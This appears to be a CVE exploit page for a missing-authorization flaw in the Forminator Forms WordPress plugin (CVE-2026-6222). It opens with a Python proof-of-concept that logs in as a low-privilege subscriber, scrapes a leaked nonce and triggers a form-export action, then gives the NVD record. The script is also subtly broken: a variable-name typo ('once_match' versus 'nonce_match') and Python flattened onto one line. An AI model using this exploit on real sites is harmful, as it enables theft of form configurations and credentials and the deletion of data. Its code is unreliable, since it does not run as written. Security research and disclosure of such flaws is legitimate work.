CVE-2026-6222

import requests import re # Configuration target_url = "http://example.com" username = "subscriber" password = "password" module_id = "123" # ID of the form/poll/quiz to target session = requests.Session() # 1. Login to get authenticated cookies login_payload = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": target_url + "/wp-admin/" } login_response = session.post(target_url + "/wp-login.php", data=login_payload) if login_response.status_code != 200: print("Login failed") exit() # 2. Extract Nonce from forminatorData # Accessing the admin page (e.g., All Forms) to load the JS object admin_page = session.get(target_url + "/wp-admin/admin.php?page=forminator-entries") # Search for the nonce in the JavaScript object # Pattern: forminator_form_request:"<nonce_value>" once_match = re.search(r'forminator_form_request:"([a-zA-Z0-9]+)"', admin_page.text) if not nonce_match: print("Nonce not found") exit() nonce = nonce_match.group(1) print(f"Extracted Nonce: {nonce}") # 3. Exploit: Trigger Export (or delete/clone) # The action is typically dispatched via admin-post.php or admin-ajax.php # Based on the description, we target the processRequest logic. exploit_url = target_url + "/wp-admin/admin-post.php" payload = { "forminator_form_request": nonce, "forminator_id": module_id, "action": "forminator_form_export" # Vulnerable action } exploit_response = session.post(exploit_url, data=payload) if exploit_response.status_code == 200: print("Exploit request sent successfully.") print("Response:", exploit_response.text[:200]) else: print("Exploit request failed.")

{"cve": {"id": "CVE-2026-6222", "sourceIdentifier": "[email protected]", "published": "2026-05-07T02:16:37.920", "lastModified": "2026-05-07T14:00:05.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Forminator Forms plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 1.51.1. This is due to the `processRequest()` method in `Forminator_Admin_Module_Edit_Page` (admin/abstracts/class-admin-module-edit-page.php) dispatching sensitive module-management actions — including export, delete, clone, delete-entries, publish/draft, and bulk variants — after only a nonce check, without ever verifying that the current user holds the `manage_forminator_modules` capability. The nonce used (`forminator_form_request`) is unconditionally embedded in the global `forminatorData` JavaScript object and localized on every Forminator admin page, including Templates and Reports pages accessible to users who explicitly lack module-management permissions. Because `processRequest()` is invoked during the `admin_menu` action hook — which fires before WordPress enforces page-level capability checks — a user whose Forminator role is restricted to Templates or Reports can craft a valid POST request targeting any published module and successfully trigger the vulnerable actions. This makes it possible for authenticated attackers with subscriber-level access (or any custom low-privilege Forminator role) to export the complete internal configuration of arbitrary forms/polls/quizzes (including notification routing, integration credentials, and conditional logic), delete modules, delete all submissions/votes, clone modules, or bulk-change publish/draft status."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/abstracts/class-admin-module-edit-page.php#L1008", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/abstracts/class-admin-module-edit-page.php#L951", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/classes/class-admin-data.php#L141", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/forminator/tags/1.52/admin/abstracts/class-admin-module-edit-page.php#L988", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/abstracts/class-admin-module-edit-page.php#L1008", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/abstracts/class-admin-module-edit-page.php#L951", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/classes/class-admin-data.php#L141", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e860aa70-b8ef-4b2a-a035-b01efce30a79?source=cve", "source": "[email protected]"}]}}